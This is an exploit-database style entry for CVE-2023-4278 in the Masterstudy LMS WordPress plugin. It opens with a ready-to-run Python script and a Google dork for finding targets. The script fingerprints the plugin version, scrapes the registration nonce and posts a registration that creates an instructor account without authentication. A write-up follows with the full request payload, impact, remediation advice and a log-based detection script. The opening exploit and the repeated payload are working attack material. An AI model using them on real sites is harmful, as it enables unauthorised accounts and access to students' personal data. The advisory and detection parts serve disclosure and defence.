Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278
import requests
import re
import time
banner = """
_______ ________ ___ ___ ___ ____ _ _ ___ ______ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) |
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) |
\_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/
======================================================================================================
|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
|| Author : https://github.com/revan-ar ||
|| Vendor Homepage : https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ ||
|| Support : https://www.buymeacoffee.com/revan.ar ||
======================================================================================================
"""
print(banner)
# get nonce
def get_nonce(target):
    open_target = requests.get("{}/user-public-account".format(target))
    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
    # re.search() returns None when the nonce is absent, so test the match
    # object itself instead of indexing it
    if search_nonce is not None:
        return search_nonce[1]
    print("Failed when getting Nonce :p")
    return None

# privilege escalation
def privesc(target, nonce, username, password, email):
    req_data = {
        "user_login": "{}".format(username),
        "user_email": "{}".format(email),
        "user_password": "{}".format(password),
        "user_password_re": "{}".format(password),
        "become_instructor": True,
        "privacy_policy": True,
        "degree": "",
        "expertize": "",
        "auditory": "",
        "additional": [],
        "additional_instructors": [],
        "profile_default_fields_for_register": [],
        "redirect_page": "{}/user-account/".format(target)
    }
    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json=req_data)
    if start.status_code == 200:
        print("[+] Exploit Success !!")
    else:
        print("[+] Exploit Failed :p")

# URL target (trailing slash stripped so paths are not joined with "//")
target = input("[+] URL Target: ").rstrip("/")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
# compare as a version tuple ("3.0.17" -> (3, 0, 17)); flattening the string
# into one integer would misorder releases such as 3.1.0
version = tuple(int(x) for x in re.findall(r"\d+", plugin_version[1])) if plugin_version else None
time.sleep(1)
if version is not None and version <= (3, 0, 17):
    print("[+] Target is Vulnerable !!")
    # Credential
    email = input("[+] Email: ")
    username = input("[+] Username: ")
    password = input("[+] Password: ")
    time.sleep(1)
    print("[+] Getting Nonce...")
    # Get Nonce (stored under a distinct name so the function is not shadowed)
    nonce = get_nonce(target)
    if nonce is not None:
        print("[+] Success Getting Nonce: {}".format(nonce))
        time.sleep(1)
        # Start PrivEsc
        privesc(target, nonce, username, password, email)
    # ----------------------------------
elif version is None:
    print("[+] Could not read the plugin version from readme.txt :p")
else:
    print("[+] Target is NOT Vulnerable :p")

WordPress Plugin Masterstudy LMS 3.0.17: Unauthenticated Instructor Account Creation Vulnerability
The Masterstudy LMS plugin, a widely used Learning Management System (LMS) for WordPress, recently had a critical security flaw disclosed that affects versions up to 3.0.17. This vulnerability, identified as CVE-2023-4278, allows attackers to create instructor accounts without authentication, bypassing the standard registration safeguards. The exploit is particularly dangerous because of its simplicity and the potential for unauthorized access to administrative features within the platform.
Understanding the Vulnerability
Masterstudy LMS is designed to help educators and institutions manage online courses, student enrollments, and content delivery. One of its core features is the ability for users to register as instructors, granting them elevated privileges such as course creation, content editing, and access to student data.
However, in versions prior to 3.0.18, the plugin does not check that the caller is authenticated before allowing a user to register as an instructor. Specifically, the stm_lms_register AJAX action, exposed at /wp-admin/admin-ajax.php?action=stm_lms_register, accepts unauthenticated requests.
An attacker can exploit this by sending a POST request with minimal data, such as a username, email and password, together with the become_instructor flag set to true. No login credentials or verification steps are required, making this a classic example of unauthenticated privilege escalation.
Exploit Mechanism and Technical Details
The exploit relies on two key components: the nonce and the action parameter. WordPress nonces are meant to prevent CSRF, not to authenticate the caller; here the nonce is embedded in a page anyone can load, and the plugin does not check that the request comes from an authenticated user, so the nonce provides no real protection against this attack.
Attackers can retrieve the required nonce by accessing the public registration page:
GET /user-public-account
This page contains the stm_lms_register nonce value embedded in the HTML source, which can be extracted with a regular expression:
re.search('"stm_lms_register":"(.*?)"', response.text)
Once obtained, the attacker can use the nonce to submit a malicious registration request to /wp-admin/admin-ajax.php with the following payload:
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={nonce}
With the payload structured as:
{
"user_login": "instructor_user",
"user_email": "instructor@example.com",
"user_password": "secure_pass123",
"user_password_re": "secure_pass123",
"become_instructor": true,
"privacy_policy": true,
"degree": "",
"expertize": "",
"auditory": "",
"additional": [],
"additional_instructors": [],
"profile_default_fields_for_register": [],
"redirect_page": "https://target-site.com/user-account/"
}
This request, when sent without authentication, creates a new user account with instructor privileges, effectively granting full control over course content and student data.
Impact and Real-World Consequences
While the exploit itself does not directly lead to data theft or server compromise, the ability to create an instructor account without authentication opens the door to:
- Unauthorized course creation: An attacker can upload malicious or inappropriate content.
- Student data exposure: Instructors can access student profiles, grades, and personal information.
- Admin-level access escalation: If the instructor role includes backend permissions, attackers can later escalate privileges.
- Website reputation damage: The presence of unauthorized instructors can undermine trust in the platform.
Additionally, this vulnerability can be leveraged in credential stuffing attacks or phishing campaigns, where attackers register fake instructors to impersonate legitimate educators and trick users into providing sensitive information.
Proof of Concept and Detection
The exploit can be tested using a simple Python script, as demonstrated in the original report by Revan Arifio. The script performs the following steps:
- Checks if the plugin is installed via readme.txt.
- Retrieves the plugin version to verify vulnerability status.
- Fetches the nonce from the public registration page.
- Submits a registration request with instructor privileges.
Example detection using a Google Dork:
inurl:/user-public-account
Such dorks are commonly used by security researchers and automated scanners to locate vulnerable installations across the web.
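As an added example that is not part of the original report or the plugin's code, the following Python script correlates the steps of the flow described above in web-server access logs, the kind of monitoring the Best Practices section recommends. It assumes Apache combined log format; the sample lines, the time windows and the scoring thresholds are constructed assumptions, not vendor guidance.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample lines in Apache "combined" log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Sep/2023:10:00:01 +0000] "GET /wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt HTTP/1.1" 200 812 "-" "python-requests/2.31.0"
203.0.113.5 - - [04/Sep/2023:10:00:03 +0000] "GET /user-public-account HTTP/1.1" 200 40211 "-" "python-requests/2.31.0"
203.0.113.5 - - [04/Sep/2023:10:00:05 +0000] "POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=0123abcd45 HTTP/1.1" 200 57 "-" "python-requests/2.31.0"
198.51.100.7 - - [04/Sep/2023:10:05:00 +0000] "GET /user-public-account HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Sep/2023:10:09:30 +0000] "POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=fedc9876ba HTTP/1.1" 200 57 "https://lms.example/user-public-account" "Mozilla/5.0"
"""
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                     r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
README_PATH = "/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt"
SCRIPT_UA = re.compile(r"python-requests|curl/|go-http-client", re.I)  # assumed non-browser clients

def classify(method, path):
    """Map one request to a step of the flow described in the report, or None."""
    if path == README_PATH:
        return "readme"        # steps 1-2: plugin presence and version fingerprint
    if method == "GET" and path.split("?")[0] == "/user-public-account":
        return "nonce_page"    # step 3: nonce harvested from the public page
    if method == "POST" and path.startswith("/wp-admin/admin-ajax.php") and "action=stm_lms_register" in path:
        return "register"      # step 4: the registration request itself
    return None

def detect_register_flows(log_text, min_score=2):
    """One finding per stm_lms_register POST; the score rises when the same client
    fingerprinted the plugin or fetched the nonce page moments before (thresholds assumed)."""
    recent = defaultdict(dict)  # ip -> {step: timestamp of the latest occurrence}
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        step = classify(m["method"], m["path"]) if m else None
        if step is None:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if step != "register":
            recent[m["ip"]][step] = ts
            continue
        seen, score = recent[m["ip"]], 0
        if "nonce_page" in seen and (ts - seen["nonce_page"]).total_seconds() <= 60:
            score += 1  # nonce page fetched seconds before the POST: scripted timing
        if "readme" in seen and (ts - seen["readme"]).total_seconds() <= 300:
            score += 2  # version check preceded the POST, as in the PoC script
        if SCRIPT_UA.search(m["ua"]) or m["referer"] == "-":
            score += 1  # non-browser client, or no registration-page referer
        findings.append({"ip": m["ip"], "time": m["ts"], "score": score, "alert": score >= min_score})
    return findings
```

Every stm_lms_register POST is recorded, so the low-score entries remain available for the periodic account audit even when they do not alert.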
Vendor Response and Remediation
The plugin developer released version 3.0.18 to patch the vulnerability. This update includes stricter authentication checks and improved nonce validation. Users are strongly advised to update immediately.
As of 2023-09-04, the vulnerability was confirmed and reported to the CVE database. The patch was released within weeks, demonstrating the vendor's responsiveness to security issues.
Best Practices for Mitigation
To protect WordPress sites using Masterstudy LMS, administrators should:
- Update immediately: Ensure the plugin is upgraded to version 3.0.18 or later.
- Disable public registration: If not required, disable the user-public-account page.
- Monitor plugin activity: Use security plugins like Wordfence or Sucuri to detect suspicious AJAX requests.
- Implement role-based access: Restrict instructor creation to admin-approved processes.
- Regular audits: Periodically review user accounts and instructor roles to detect unauthorized entries.
Conclusion
The CVE-2023-4278 vulnerability in Masterstudy LMS highlights a common yet dangerous flaw in WordPress plugins: unauthenticated privilege escalation. It serves as a reminder that even well-intentioned features can become security risks if not properly secured.
For developers and site owners, this incident underscores the importance of:
- Continuous monitoring of third-party plugins.
- Adopting secure coding practices, especially around AJAX endpoints.
- Regularly updating software to patch known vulnerabilities.
Security is not a one-time task—it’s an ongoing process. By staying vigilant, organizations can prevent attackers from exploiting such flaws before they cause harm.